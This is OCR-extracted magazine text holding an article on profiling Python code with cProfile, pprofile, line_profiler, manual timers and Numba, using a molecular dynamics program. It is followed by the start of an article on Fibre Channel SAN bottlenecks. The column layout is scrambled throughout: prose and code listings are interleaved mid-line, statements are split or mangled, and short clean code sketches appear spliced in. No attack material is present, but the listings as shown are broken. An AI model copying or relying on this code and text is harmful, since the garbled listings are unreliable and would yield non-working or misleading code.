start_time = time.time()
# Code to check follows
a, b = 1, 2
c = a + b
# Code to check ends
end_time = time.time()
time_taken = (end_time - start_time)

print(" Time taken in seconds: {0} s".format(time_taken))

Listing 2: cProfile Output

Thu Nov 7 08:09:57 2019
12791143 function calls (12788375 primitive calls) in 156.745 seconds

Ordered by: cumulative time

ncalls    tottime  percall  cumtime  percall filename:lineno(function)
148/1     0.001    0.000    156.745  156.745 {built-in method builtins.exec}
1         149.964  149.964  156.745  156.745 md_002.py:3()
12724903  3.878    0.000    3.878    0.000   {built-in method builtins.min}
1         2.649    2.649    2.727    2.727   md_002.py:10(init)
50        0.168    0.003    0.168    0.003   md_002.py:127(update)
175/2     0.001    0.000    0.084    0.042   :978(_find_and_load)
...
of the code was called. deterministic or


The deterministic pprofile sample Line-by-Line Function can help. The line_profiler module
output in Listing 3 uses the same performs line-by-line profiling of
Profiling
code as the previous cProfile ex- functions, and the kernprof script al-
ample. I cut out sections of the The useful pprofile analyzes your lows you to run either line_profiler
output because it is very extensive. I entire code line by line. It can or standard Python profilers such as
do want to point out the increase in also do deterministic and statisti- cProfile.
execution time by about a factor of cal profiling. If you want to focus To have kernprof run line_profiler,
10 (i.e., it ran 10 times slower than on a specific function within your enter,
without profiling). code, line_profiler and kernprof
$ kernprof -l script_to_profile.py
Listing 3: pprofile Output
Command line: md_002.py which will produce a binary file,
Total duration: 1662.48s script_to_profile.py.lprof. To “de-
File: md_002.py code” the data, you can enter the
File duration: 1661.74s (99.96%) command:
Line #| Hits| Time| Time per hit| %|Source code
------+----------+-------------+-------------+-------+----------- $ python3 -m line_profiler U
1| 0| 0| 0| 0.00%|# md test code script_to_profile.py.lprof > results.txt
2| 0| 0| 0| 0.00%|
3| 2| 3.50475e-05| 1.75238e-05| 0.00%|import platform
and look at the results.txt file.
4| 1| 2.19345e-05| 2.19345e-05| 0.00%|from time import clock
To get line_profiler to profile only
(call)| 1| 2.67029e-05| 2.67029e-05| 0.00%|# :1009 _handle_fromlist
5| 1| 2.55108e-05| 2.55108e-05| 0.00%|import numpy as np
certain functions, put an @profile
(call)| 1| 0.745732| 0.745732| 0.04%|# :978 _find_and_load decorator before the function declara-
6| 1| 2.57492e-05| 2.57492e-05| 0.00%|from sys import exit tion. The output is the elapsed time
(call)| 1| 1.7643e-05| 1.7643e-05| 0.00%|# :1009 _handle_fromlist for the routine. The percentage of
7| 1| 7.86781e-06| 7.86781e-06| 0.00%|import time time, which is something I tend to
... check first, is relative to the total time
234| 0| 0| 0| 0.00%| # Compute the potential energy and forces for the function (be sure to remember
235| 12525000| 51.0831| 4.07849e-06| 3.07%| for j in range(0, p_num): that). The example in Listing 4 is
236| 12500000| 51.6473| 4.13179e-06| 3.11%| if (i != j):
output for some example code dis-
237| 0| 0| 0| 0.00%| # Compute RIJ, the displacement vector
cussed in the next section.
238| 49900000| 210.704| 4.22253e-06| 12.67%| for k in range(0, d_num):
239| 37425000| 177.055| 4.73093e-06| 10.65%| rij[k] = pos[k,i] - pos[k,j]
240| 0| 0| 0| 0.00%| # end for Example Code
241| 0| 0| 0| 0.00%|
242| 0| 0| 0| 0.00%| # Compute D and D2, a distance and a To better illustrate the process of
truncated distance using a profiler, I chose some MD
243| 12475000| 50.5158| 4.04936e-06| 3.04%| d = 0.0 Python code with a fair amount of
244| 49900000| 209.465| 4.1977e-06| 12.60%| for k in range(0, d_num): arithmetic intensity that could eas-
245| 37425000| 175.823| 4.69801e-06| 10.58%| d = d + rij[k] ** 2 ily be put into functions. Because
246| 0| 0| 0| 0.00%| # end for I’m not a computational chemist,
247| 12475000| 78.9422| 6.32803e-06| 4.75%| d = np.sqrt(d)
let me quote from the website: “The
248| 12475000| 64.7463| 5.19008e-06| 3.89%| d2 = min(d, np.pi / 2.0)
computation involves following
249| 0| 0| 0| 0.00%|
the paths of particles which exert a
250| 0| 0| 0| 0.00%| # Attribute half of the total
potential energy to particle J
distance-dependent force on each
251| 12475000| 84.7846| 6.79636e-06| 5.10%| potential = potential + 0.5 * other. The particles are not con-
np.sin(d2) * np.sin(d2) strained by any walls; if particles
252| 0| 0| 0| 0.00%| meet, they simply pass through each
253| 0| 0| 0| 0.00%| # Add particle J's contribution to the other. The problem is treated as a
force on particle I. coupled set of differential equations.
254| 49900000| 227.88| 4.56674e-06| 13.71%| for k in range(0, d_num): The system of differential equation
255| 37425000| 244.374| 6.52971e-06| 14.70%| force[k,i] = force[k,i] - rij[k] * is discretized by choosing a dis-
np.sin(2.0 * d2) / d
crete time step. Given the position
256| 0| 0| 0| 0.00%| # end for
and velocity of each particle at one
257| 0| 0| 0| 0.00%| # end if
time step, the algorithm estimates
258| 0| 0| 0| 0.00%|
259| 0| 0| 0| 0.00%| # end for
these values at the next time step.
... To compute the next position of
each particle requires the evaluation


of the right hand side of its corre- Listing 4: Profiling a Function


sponding differential equation.”
Total time: 0.365088 s
File: ./md_002.py
Serial Code and Profiling Function: update at line 126

When you download the Python Line # Hits Time Per Hit % Time Line Contents
version of the code, it already has ==============================================================
several functions. To better illustrate 126 @profile
profiling the code, I converted it 127 def update(d_num, p_num, rmass, dt, pos, vel, acc, force):
128
to simple serial code and called it
129 # Update
md_001.py (Listing 5). Then, I pro-
130
filed the code with cProfile: 131 # Update positions
132 200 196.0 1.0 0.1 for i in range(0, d_num):
$ python3 -m cProfile -s cumtime md_001.py 133 75150 29671.0 0.4 8.1 for j in range(0, p_num):
134 75000 117663.0 1.6 32.2 pos[i,j] = pos[i,j] + vel[i,j]*dt + 0.5 *
Listing 6 is the top of the profile acc[i,j]*dt*dt
135 # end for
output ordered by cumulative time
136 # end for
(cumtime). Notice that the profile out-
137
put only lists the code itself. Because 138 # Update velocities
it doesn’t profile the code line by 139 200 99.0 0.5 0.0 for i in range(0, d_num):
line, it’s impossible to learn anything 140 75150 29909.0 0.4 8.2 for j in range(0, p_num):
about the code. 141 75000 100783.0 1.3 27.6 vel[i,j] = vel[i,j] + 0.5*dt*( force[i,j] *
I also used pprofile: rmass + acc[i,j] )
142 # end for
143 # end for
$ pprofile md_001.py
144
145 # Update accelerations.
The default options cause the code 146 200 95.0 0.5 0.0 for i in range(0, d_num):
to run much slower because it is 147 75150 29236.0 0.4 8.0 for j in range(0, p_num):
tracking all computations (i.e., it is 148 75000 57404.0 0.8 15.7 acc[i,j] = force[i,j]*rmass
not sampling), but the code lines 149 # end for
150 # end for
relative to the run time still impart
151
some good information (Listing 7).
152 50 32.0 0.6 0.0 return pos, vel, acc
Note that the code ran slower by

Listing 5: md001.py
## MD is the main program for the molecular dynamics simulation. #
# # Input, integer STEP_NUM, the number of time steps.
# Discussion: # A value of 500 is a small but reasonable value.
# MD implements a simple molecular dynamics simulation. # The default value is 500.
# #
# The velocity Verlet time integration scheme is used. # Input, real DT, the time step.
# The particles interact with a central pair potential. # A value of 0.1 is large; the system will begin to move quickly but the
# # results will be less accurate.
# Licensing: # A value of 0.0001 is small, but the results will be more accurate.
# This code is distributed under the GNU LGPL license. # The default value is 0.1.
# Modified: #
# 26 December 2014
# import platform
# Author: from time import clock
# John Burkardt import numpy as np
# from sys import exit
# Parameters: import time
# Input, integer D_NUM, the spatial dimension.
# A value of 2 or 3 is usual. def timestamp ( ):
# The default value is 3. t = time.time ( )
# print ( time.ctime ( t ) )
# Input, integer P_NUM, the number of particles.
# A value of 1000 or 2000 is small but "reasonable". return None
# The default value is 500. # end def


Listing 5: md001.py (continued)


if (seed == 0):
# =================== print('' )
# Main section of code print( 'R8MAT_UNIFORM_AB - Fatal error!')
# ==================== print(' Input SEED = 0!' )
timestamp() sys.ext('R8MAT_UNIFORM_AB - Fatal error!')
print('') # end if
print('MD_TEST')
print(' Python version: %s' % (platform.python_version( ) )) pos = np.zeros( (d_num, p_num) )
print(' Test the MD molecular dynamics program.')
for j in range(0, p_num):
# Initialize variables for i in range(0, d_num):
d_num = 3 k = (seed // 127773)
p_num = 500
step_num = 50 seed = 16807 * (seed - k * 127773) - k * 2836
dt = 0.1
mass = 1.0 seed = (seed % i4_huge)
rmass = 1.0 / mass
if (seed < 0):
wtime1 = clock( ) seed = seed + i4_huge
# end if
# output:
print('' ) pos[i,j] = a + (b - a) * seed * 4.656612875E-10
print('MD' ) # end for
print(' Python version: %s' % (platform.python_version( ) ) ) # end for
print(' A molecular dynamics program.' )
print('' ) # Velocities
print(' D_NUM, the spatial dimension, is %d' % (d_num) ) vel = np.zeros([ d_num, p_num ])
print(' P_NUM, the number of particles in the simulation is %d.' % (p_num) )
print(' STEP_NUM, the number of time steps, is %d.' % (step_num) ) # Accelerations
print(' DT, the time step size, is %g seconds.' % (dt) ) acc = np.zeros([ d_num, p_num ])
else:
print('' ) # Update
print(' At each step, we report the potential and kinetic energies.' )
print(' The sum of these energies should be a constant.' ) # Update positions
print(' As an accuracy check, we also print the relative error' ) for i in range(0, d_num):
print(' in the total energy.' ) for j in range(0, p_num):
print('' ) pos[i,j] = pos[i,j] + vel[i,j] * dt + 0.5 * acc[i,j] * dt * dt
print(' Step Potential Kinetic (P+K-E0)/E0' ) # end for
print(' Energy P Energy K Relative Energy Error') # end for
print('')
# Update velocities
step_print_index = 0 for i in range(0, d_num):
step_print_num = 10 for j in range(0, p_num):
step_print = 0 vel[i,j] = vel[i,j] + 0.5 * dt * ( force[i,j] * rmass +
acc[i,j] )
for step in range(0, step_num+1): # end for
if (step == 0): # end for
# Initialize
# Update accelerations.
# Positions for i in range(0, d_num):
seed = 123456789 for j in range(0, p_num):
acc[i,j] = force[i,j] * rmass
a = 0.0 # end for
b = 10.0 # end for
# endif
i4_huge = 2147483647
# compute force, potential, kinetic
if (seed < 0): force = np.zeros([ d_num, p_num ])
seed = seed + i4_huge rij = np.zeros(d_num)
# end if
potential = 0.0


Listing 5: md001.py (continued)


for k in range(0, d_num):
for i in range(0, p_num): for j in range(0, p_num):
kinetic = kinetic + vel[k,j] ** 2
# Compute the potential energy and forces. # end for
for j in range(0, p_num): # end for
if (i != j):
kinetic = 0.5 * mass * kinetic
# Compute RIJ, the displacement vector.
for k in range(0, d_num): if (step == 0):
rij[k] = pos[k,i] - pos[k,j] e0 = potential + kinetic
# end for # endif

# Compute D and D2, a distance and a truncated distance. if (step == step_print):


rel = (potential + kinetic - e0) / e0
d = 0.0 print(' %8d %14f %14f %14g' % (step, potential, kinetic, rel) )
for k in range(0, d_num): step_print_index = step_print_index + 1
d = d + rij[k] ** 2 step_print = (step_print_index * step_num) // step_print_num
# end for #end if
d = np.sqrt(d)
d2 = min(d, np.pi / 2.0) # end step

# Attribute half of the total potential energy to particle J. wtime2 = clock( )


potential = potential + 0.5 * np.sin(d2) * np.sin(d2)
print('')
# Add particle J's contribution to the force on particle I. print(' Elapsed wall clock time = %g seconds.' % (wtime2 - wtime1) )
for k in range(0, d_num):
force[k,i] = force[k,i] - rij[k] * np.sin(2.0 * d2) / d # Terminate
# end for
# end if print('')
print('MD_TEST')
# end for print(' Normal end of execution.')
# end for
timestamp ( )
# Compute the kinetic energy
kinetic = 0.0 # end if

Listing 6: cProfile Output

Sat Oct 26 09:43:21 2019
12791090 function calls (12788322 primitive calls) in 163.299 seconds

Ordered by: cumulative time

ncalls    tottime  percall  cumtime  percall  filename:lineno(function)
148/1     0.001    0.000    163.299  163.299  {built-in method builtins.exec}
1         159.297  159.297  163.299  163.299  md_001.py:3()
12724903  3.918    0.000    3.918    0.000    {built-in method builtins.min}
175/2     0.001    0.000    0.083    0.042    :978(_find_and_load)
175/2     0.001    0.000    0.083    0.042    :948(_find_and_load_unlocked)
165/2     0.001    0.000    0.083    0.041    :663(_load_unlocked)
...

about a factor of 10. Only the parts of the code with some fairly large percentages of time are shown.
The output from pprofile provides an indication of where the code uses the most time:
* The loop computing rij[k].
* The loop summing d (collective operation).
* Computing the square root of d.
* Computing d2.
* Computing the potential energy.
* The loop computing the force array.
Another option is to put timing points throughout the code, focusing primarily on the section of the code computing potential energy and forces. This code produced the output shown in Listing 8. Notice that the time to compute the potential and force update values is 181.9 seconds with a total time of 189.5 seconds. Obviously, this is where you would need to focus your efforts to improve code performance.

First Function Creation

The potential energy and force computations are the dominant part of the run time, so to better profile them, it is best to isolate that code in a function. Perhaps a bit counterintuitively, I created a function that initializes the algorithm and a second function for the update loops and called the resulting code md_002.py. (My modified code is available online.) Because the potential energy


and force computations change very little, I won't be profiling this version of the code. All I did was make sure I was getting the same answers as in the previous version. However, feel free to practice profiling it.

Final Version

The final version of the code moves the section of code computing the potential energy and forces into a function for better profiling. The code, md_003.py, has a properties function that computes the potential energy and forces.
The cProfile results don't show anything useful, so I will skip that output. On the other hand, the pprofile

Listing 7: pprofile Output


Command line: ./md_001.py
Total duration: 1510.79s
File: ./md_001.py
File duration: 1510.04s (99.95%)
Line #| Hits| Time| Time per hit| %|Source code
------+----------+-------------+-------------+-------+-----------
...
141| 25551| 0.0946999| 3.70631e-06| 0.01%| for i in range(0, p_num):
142| 0| 0| 0| 0.00%|
143| 0| 0| 0| 0.00%| # Compute the potential energy and forces.
144| 12775500| 47.1989| 3.69449e-06| 3.12%| for j in range(0, p_num):
145| 12750000| 47.4793| 3.72387e-06| 3.14%| if (i != j):
146| 0| 0| 0| 0.00%|
147| 0| 0| 0| 0.00%| # Compute RIJ, the displacement vector.
148| 50898000| 194.963| 3.83046e-06| 12.90%| for k in range(0, d_num):
149| 38173500| 166.983| 4.37432e-06| 11.05%| rij[k] = pos[k,i] - pos[k,j]
150| 0| 0| 0| 0.00%| # end for
151| 0| 0| 0| 0.00%|
152| 0| 0| 0| 0.00%| # Compute D and D2, a distance and a truncated distance.
153| 0| 0| 0| 0.00%|
154| 12724500| 46.7333| 3.6727e-06| 3.09%| d = 0.0
155| 50898000| 195.426| 3.83956e-06| 12.94%| for k in range(0, d_num):
156| 38173500| 165.494| 4.33531e-06| 10.95%| d = d + rij[k] ** 2
157| 0| 0| 0| 0.00%| # end for
158| 12724500| 72.0723| 5.66406e-06| 4.77%| d = np.sqrt(d)
159| 12724500| 59.0492| 4.64059e-06| 3.91%| d2 = min(d, np.pi / 2.0)
160| 0| 0| 0| 0.00%|
161| 0| 0| 0| 0.00%| # Attribute half of the total potential energy to particle J.
162| 12724500| 76.7099| 6.02852e-06| 5.08%| potential = potential + 0.5 * np.sin(d2) * np.sin(d2)
163| 0| 0| 0| 0.00%|
164| 0| 0| 0| 0.00%| # Add particle J's contribution to the force on particle I.
165| 50898000| 207.158| 4.07005e-06| 13.71%| for k in range(0, d_num):
166| 38173500| 228.123| 5.97595e-06| 15.10%| force[k,i] = force[k,i] - rij[k] * np.sin(2.0 * d2) / d
167| 0| 0| 0| 0.00%| # end for
168| 0| 0| 0| 0.00%| # end if
169| 0| 0| 0| 0.00%|
170| 0| 0| 0| 0.00%| # end for
171| 0| 0| 0| 0.00%| # end for
172| 0| 0| 0| 0.00%|
...

Listing 8: md_001b.py Output


Elapsed wall clock time = 189.526 seconds. Total Time for force update = 181.927011 seconds
Avg Time for force update = 0.000014 seconds
Total Time for position update = 0.089102 seconds
Avg Time for position update = 0.001782 seconds Total Time for force loop = 75.269342 seconds
Total Time for velocity update = 0.073946 seconds Avg Time for force loop = 0.000006 seconds
Avg Time for velocity update = 0.001479 seconds
Total Time for acceleration update = 0.031308 seconds Total Time for rij loop = 25.444300 seconds
Avg Time for acceleration update = 0.000626 seconds Avg Time for rij loop = 0.000002 seconds

Total Time for potential update = 103.215999 seconds MD_TEST


Avg Time for potential update = 0.000008 seconds Normal end of execution.
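The totals and averages in Listing 8 come from manual timing points of the kind described in the "Manual Profiling" section. A small sketch of one way to accumulate them (the section names and structure are illustrative, not the article's code):

import time

timers = {}   # section name -> (total elapsed seconds, number of calls)

def record(section, start):
    elapsed = time.time() - start
    total, calls = timers.get(section, (0.0, 0))
    timers[section] = (total + elapsed, calls + 1)

# Example: wrap one section of interest inside the main loop
start = time.time()
# ... the force update code would run here ...
record("force update", start)

for section, (total, calls) in timers.items():
    print("Total Time for %s = %f seconds" % (section, total))
    print("Avg Time for %s = %f seconds" % (section, total / calls))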


output has some useful information Listing 9: md_003.py Output Excerpts


(Listing 9). The excerpts mostly
Command line: md_003.py
focus on the function that computes Total duration: 1459.49s
potential energy and forces. Notice File: md_003.py
that the overall time to run the code File duration: 1458.73s (99.95%)
Line #| Hits| Time| Time per hit| %|Source code
is still about 10 times longer. ------+----------+-------------+-------------+-------+-----------
Again, most of the time in the code 1| 0| 0| 0| 0.00%|# md test code
is spent in the properties function, 2| 0| 0| 0| 0.00%|
3| 2| 3.40939e-05| 1.70469e-05| 0.00%|import platform
which computes the potential energy 4| 1| 2.28882e-05| 2.28882e-05| 0.00%|from time import clock
and forces. The first few loops take (call)| 1| 2.71797e-05| 2.71797e-05| 0.00%|# :1009 _handle_fromlist
up most of the time. 5| 1| 2.69413e-05| 2.69413e-05| 0.00%|import numpy as np
(call)| 1| 0.751632| 0.751632| 0.05%|# :978 _find_and_load
Out of curiosity, I looked at the out-
6| 1| 2.47955e-05| 2.47955e-05| 0.00%|from sys import exit
put from line_profiler (Listing 10). (call)| 1| 1.78814e-05| 1.78814e-05| 0.00%|# :1009 _handle_fromlist
Remember that all time percentages 7| 1| 8.34465e-06| 8.34465e-06| 0.00%|import time
...
are relative to the time for that par-
160| 51| 0.000295162| 5.78749e-06| 0.00%|def properties(p_num, d_num, pos, vel, mass):
ticular routine (not the entire code). 161| 0| 0| 0| 0.00%|
The first couple of loops used a fair 162| 50| 0.000397682| 7.95364e-06| 0.00%| import numpy as np
percentage of the run time. The last 163| 0| 0| 0| 0.00%|
164| 0| 0| 0| 0.00%|
loop that computes the force array, 165| 0| 0| 0| 0.00%| # compute force, potential, kinetic
166| 50| 0.000529528| 1.05906e-05| 0.00%| force = np.zeros([ d_num, p_num ])
for k in range(0, d_num): 167| 50| 0.000378609| 7.57217e-06| 0.00%| rij = np.zeros(d_num)
168| 0| 0| 0| 0.00%|
force[k,i] = force[k,i] - rij[k] * U 169| 50| 0.000226259| 4.52518e-06| 0.00%| potential = 0.0
np.sin U 170| 0| 0| 0| 0.00%|
(2.0 * d2) / d 171| 25050| 0.0909703| 3.63155e-06| 0.01%| for i in range(0, p_num):
172| 0| 0| 0| 0.00%|
173| 0| 0| 0| 0.00%| # Compute the potential energy and forces
used about 25 percent of the run time 174| 12525000| 44.7758| 3.57492e-06| 3.07%| for j in range(0, p_num):
for this function. 175| 12500000| 45.4399| 3.63519e-06| 3.11%| if (i != j):
176| 0| 0| 0| 0.00%| # Compute RIJ, the displacement vector
If you look at this routine in the
177| 49900000| 183.525| 3.67786e-06| 12.57%| for k in range(0, d_num):
md_003.py file, I’m sure you can find 178| 37425000| 155.539| 4.15603e-06| 10.66%| rij[k] = pos[k,i] - pos[k,j]
some optimizations that would im- 179| 0| 0| 0| 0.00%| # end for
180| 0| 0| 0| 0.00%|
prove performance.
181| 0| 0| 0| 0.00%| # Compute D and D2, a distance and a
truncated distance
182| 12475000| 44.5996| 3.57512e-06| 3.06%| d = 0.0
Using Numba 183| 49900000| 184.464| 3.69668e-06| 12.64%| for k in range(0, d_num):
184| 37425000| 155.339| 4.15067e-06| 10.64%| d = d + rij[k] ** 2
As part of the profiling, I moved 185| 0| 0| 0| 0.00%| # end for
parts of the code to functions. With 186| 12475000| 68.8519| 5.51919e-06| 4.72%| d = np.sqrt(d)
Python, this allowed me to perform 187| 12475000| 56.0835| 4.49567e-06| 3.84%| d2 = min(d, np.pi / 2.0)
188| 0| 0| 0| 0.00%|
deterministic profiling without result- 189| 0| 0| 0| 0.00%| # Attribute half of the total
ing in a long run time. Personally, I potential energy to particle J
like deterministic profiling better than 190| 12475000| 74.6307| 5.98242e-06| 5.11%| potential = potential + 0.5 *
np.sin(d2) * np.sin(d2)
statistical because I don’t have to 191| 0| 0| 0| 0.00%|
find the time interval that results in a 192| 0| 0| 0| 0.00%| # Add particle J's contribution to the
good profile. force on particle I.
193| 49900000| 199.233| 3.99264e-06| 13.65%| for k in range(0, d_num):
Putting parts of the code in func-
194| 37425000| 212.352| 5.67406e-06| 14.55%| force[k,i] = force[k,i] - rij[k] *
tions provides a good starting point np.sin(2.0 * d2) / d
for using Numba. I described the 195| 0| 0| 0| 0.00%| # end for
use of Numba in a previous high- 196| 0| 0| 0| 0.00%| # end if
197| 0| 0| 0| 0.00%|
performance Python article [2]. I 198| 0| 0| 0| 0.00%| # end for
made a few more changes to the last 199| 0| 0| 0| 0.00%| # end for
version of the code (md_003.py) and, 200| 0| 0| 0| 0.00%|
201| 0| 0| 0| 0.00%| # Compute the kinetic energy
because the properties routine took 202| 50| 0.000184059| 3.68118e-06| 0.00%| kinetic = 0.0
a majority of the run time, I targeted 203| 200| 0.000753641| 3.76821e-06| 0.00%| for k in range(0, d_num):
this routine with Numba and simply 204| 75150| 0.265535| 3.5334e-06| 0.02%| for j in range(0, p_num):
205| 75000| 0.298971| 3.98628e-06| 0.02%| kinetic = kinetic + vel[k,j] ** 2
used jit to compile the code. 206| 0| 0| 0| 0.00%| # end for
The original code, before using 207| 0| 0| 0| 0.00%| # end for
Numba, was around 140 seconds 208| 0| 0| 0| 0.00%|
209| 50| 0.000200987| 4.01974e-06| 0.00%| kinetic = 0.5 * mass * kinetic
on my laptop. After using Numba


Listing 9: md_003.py Output Excerpts (continued) and running on all eight cores of my
laptop (four “real” cores and four
210| 0| 0| 0| 0.00%|
211| 50| 0.000211716| 4.23431e-06| 0.00%| return force, kinetic, potential hyper-threading (HT) cores), it ran in
212| 0| 0| 0| 0.00%| about 3.6 seconds. I would call that
213| 0| 0| 0| 0.00%|# end def a success.
...
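The change itself is small. As a hedged illustration (not the article's exact code), a simplified properties-style routine compiled with Numba might look like the sketch below; numba.njit and prange are the real Numba APIs, while the function body is only a stand-in for the md_003.py routine:

import numpy as np
from numba import njit, prange

@njit(parallel=True)           # compile to machine code; parallelize prange loops
def properties_nb(pos, vel, mass):
    d_num, p_num = pos.shape
    force = np.zeros((d_num, p_num))
    potential = 0.0
    for i in prange(p_num):                    # outer loop spread across cores
        for j in range(p_num):
            if i != j:
                d = 0.0
                for k in range(d_num):
                    d += (pos[k, i] - pos[k, j]) ** 2
                d = np.sqrt(d)
                d2 = min(d, np.pi / 2.0)
                potential += 0.5 * np.sin(d2) * np.sin(d2)   # scalar reduction
                for k in range(d_num):
                    force[k, i] -= (pos[k, i] - pos[k, j]) * np.sin(2.0 * d2) / d
    kinetic = 0.5 * mass * np.sum(vel ** 2)
    return force, kinetic, potential

The first call includes compilation time; subsequent calls run the compiled version.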

Listing 10: md_003.py line_profiler Output


Summary
Total time: 358.778 s Profiling Python is not always an easy
File: ./md_003.py task, but I hope I’ve covered some
Function: properties at line 159
of the tools you might use. Before
Line # Hits Time Per Hit % Time Line Contents using any of the tools, be sure you
============================================================== know how it does the profiling – de-
159 @profile
160 def properties(p_num, d_num, pos, vel, mass): terministic or statistical – and what it
161 is profiling – the entire code or just a
162 50 164.0 3.3 0.0 import numpy as np function.
163
164 Although I didn’t talk much about
165 # compute force, potential, kinetic putting timing points in code (manual
166 50 351.0 7.0 0.0 force = np.zeros([ d_num, p_num ]) profiling), I’m a bit old school. That
167 50 153.0 3.1 0.0 rij = np.zeros(d_num)
168 level of control lets me gather tim-
169 50 30.0 0.6 0.0 potential = 0.0 ing data for various portions of code
170 pretty easily. If you are old school
171 25050 14447.0 0.6 0.0 for i in range(0, p_num):
172
like me, you are probably already us-
173 # Compute the potential energy and forces ing this method in your code. If you
174 12525000 7036459.0 0.6 2.0 for j in range(0, p_num): haven’t done it before, I suggest giv-
175 12500000 7730669.0 0.6 2.2 if (i != j):
176 # Compute RIJ, the displacement vector
ing it a try.
177 49900000 33530834.0 0.7 9.3 for k in range(0, d_num): In using one or more of the profiling
178 37425000 39827594.0 1.1 11.1 rij[k] = pos[k,i] - pos[k,j] tools, I suggest putting code in func-
179 # end for
180
tions and profiling those functions
181 # Compute D and D2, a distance and a deterministically, if possible, so you
truncated distance can isolate various parts of a pro-
182 12475000 7182783.0 0.6 2.0 d = 0.0
gram. While you are isolating parts of
183 49900000 33037923.0 0.7 9.2 for k in range(0, d_num):
184 37425000 39131501.0 1.0 10.9 d = d + rij[k] ** 2 your code in functions, why not take
185 # end for advantage of the situation and look at
186 12475000 25236413.0 2.0 7.0 d = np.sqrt(d)
using Numba to compile these func-
187 12475000 13375864.0 1.1 3.7 d2 = min(d, np.pi / 2.0)
188 tions? The speed-up obtained can be
189 # Attribute half of the total potential pretty amazing. Q
energy to particle J
190 12475000 31104186.0 2.5 8.7 potential = potential + 0.5 * np.sin(d2)
* np.sin(d2)
191 Info
192 # Add particle J's contribution to the
[1] Better Programming:
force on particle I.
193 49900000 34782251.0 0.7 9.7 for k in range(0, d_num): [https://medium.com/better-programming/
194 37425000 86664317.0 2.3 24.2 force[k,i] = force[k,i] - rij[k] * 20-python-snippets-you-should-learn-
np.sin(2.0 * d2) / d today-8328e26ff124]
195 # end for
196 # end if [2] “High-Performance Python – Compiled
197 Code and C Interface” by Jeff Layton:
198 # end for [http://www.admin-magazine.com/HPC/
199 # end for
200 Articles/High-Performance-Python-3/
201 # Compute the kinetic energy (language)/eng-US]
202 50 33.0 0.7 0.0 kinetic = 0.0
203 200 147.0 0.7 0.0 for k in range(0, d_num):
204 75150 44048.0 0.6 0.0 for j in range(0, p_num):
205 75000 78144.0 1.0 0.0 kinetic = kinetic + vel[k,j] ** 2 The Author
206 # end for Jeff Layton has been in the HPC business
207 # end for
208 for almost 25 years (starting when he was 4
209 50 47.0 0.9 0.0 kinetic = 0.5 * mass * kinetic years old). He can be found lounging around
210 at a nearby Frys enjoying the coffee and
211 50 37.0 0.7 0.0 return force, kinetic, potential
waiting for sales.


Monitor and optimize


Fibre Channel SAN performance

Tune Up
We discuss the possible bottlenecks in Fibre Channel storage area networks and how to resolve them. By Roland Döllinger

Figure 1: The Fibre Channel frames are transferred by the SAN from the sender (server) to the receiver (storage array) over the FC switch ports by the connectionless buffer-to-buffer method.

In the past, spinning hard disks were often a potential bottleneck for fast data processing, but in the age of hybrid and all-flash storage systems, the bottlenecks are shifting to other locations on the storage area network (SAN). I talk about where it makes sense to influence the data stream and how possible bottlenecks can be detected at an early stage. To this end, I will be determining the critically important performance parameters within a Fibre Channel SAN and showing optimization approaches.
The Fibre Channel (FC) protocol is connectionless and transports data packets in buffer-to-buffer (B2B) mode. Two endpoints, such as a host bus adapter (HBA) and a switch port, negotiate a number of FC frames, which are added to the input buffer as buffer credits at the other end, allowing the sender to transmit a certain number of frames to the receiver on a network without having to wait for each individual data packet to be confirmed (Figure 1).
For each data packet sent, the buffer credit is reduced by a value of one, and for each data packet confirmed by the other party, the value increases by one. The remote station sends a receive ready (R_RDY) message to the sender as soon as the frames have been processed and new data can be sent. If the sender does not receive this R_RDY message and all buffer credits are used up, no further data packets are transmitted until the sender receives the message. Actual flow control of the data is handled by the higher level SCSI protocol.
Suppose a server writes data over a Fibre Channel SAN to a remote storage system; the FC frames are forwarded to multiple locations along the way in the B2B process, as is the case whenever an HBA or a storage port communicates with a switch port or two switches exchange data with each other over one or more Inter-Switch Link (ISL) connections connected in parallel. With this FC transport layer method – service class 3 (connectionless without acknowledgement) optimized for mass storage data – many FC devices can communicate in parallel with high bandwidth. However, this type of


communication also has weaknesses, speeds between endpoints on the number (LUN) of a storage system.
which quickly become apparent in SAN. For example, if the HBA oper- When the commands arrive, they are
certain constellations. ates at a bandwidth of 8Gbps while put into a kind of waiting loop be-
the front-end port on the storage fore it is their turn to be processed.
Backlog by R_RDY Messages system operates at 16Gbps, the stor- Especially for random I/O opera-
age port can process the data almost tions, this arrangement offers signifi-
One example of this type of backlog twice as fast as the HBA. In return, cant performance gain.
is an HBA or memory port that does at full transfer rate, the storage The number of I/O operations that
not return R_RDY messages to the system returns twice the volume of can be buffered in this queue is
sender because of a technical defect data to the HBA that it could pro- known as the queue depth. Important
or driver problem or that only returns cess in the same time. values include the maximum queue
R_RDY messages to the sender after Buffering the received frames also depth per LUN and per front-end
a delay. In turn, transmission of new nibbles away the buffer credits there, port of a storage array. These values
frames are delayed. Incoming data is which can cause a backlog and a are usually fixed in the storage sys-
then stored and consumes the avail- fabric congestion given a continu- tem and immutable. On the other
able buffer credits. The backlog then ously high data transfer volume. The hand, you can specify the maximum
spreads farther back and gradually situation becomes even more drastic queue depth on the server side of
uses up the buffer credits of the other with high data volumes at 4 and the HBA or in its driver. Make sure
FC ports on the route. 32Gbps. Such effects typically occur that the sum of the queue depths of
Especially with shared connections, at high data rates on the ports of the all LUNs on a front-end port does
all SAN subscribers who communi- nodes with the lowest bandwidth in not exceed its maximum permitted
cate over the same ISL connection are the data stream. queue depth. If, for example, 100
negatively affected because no buffer Additionally, too high a fan-in ratio of LUNs are mapped to an array port
credits are available for them during servers to the storage port is possible and addressed by their servers with
this period. A single slow-drain de- (i.e., too high a volume of data from a queue depth of 16, the maximum
vice can lead to a massive drop in the the servers arriving at the storage queue depth value at the array port
performance of many SAN devices port, which is no longer able to pro- must be greater than 1,600. If, on the
(fabric congestions). Although most cess the data). My recommendation other hand, the maximum value of
FC switch manufacturers have now is therefore to adapt the speed of the a port is only 1,024, the connected
developed countermeasures against HBA and storage port to a uniform servers can only work with a queue
such fabric congestions, they only speed and, depending on the data depth of 10 with these LUNs. It
take effect when the problem has transfer rates, maintain a moderate makes sense to ask the vendor about
already occurred and are only avail- fan-in ratio between servers and the the limits and optimum settings for
able for the newer generations of SAN storage port, if possible. the queue depth.
components. To reduce the data traffic fundamen- If a front-end port is overloaded be-
To detect fabric congestions at an tally over the ISLs, you will want to cause of incorrect settings and too
early stage, you at least need to moni- configure your servers such that the many parallel I/O operations, and
tor the ISL ports on the SAN for such hosts only read locally in the case of all queues are used up, the storage
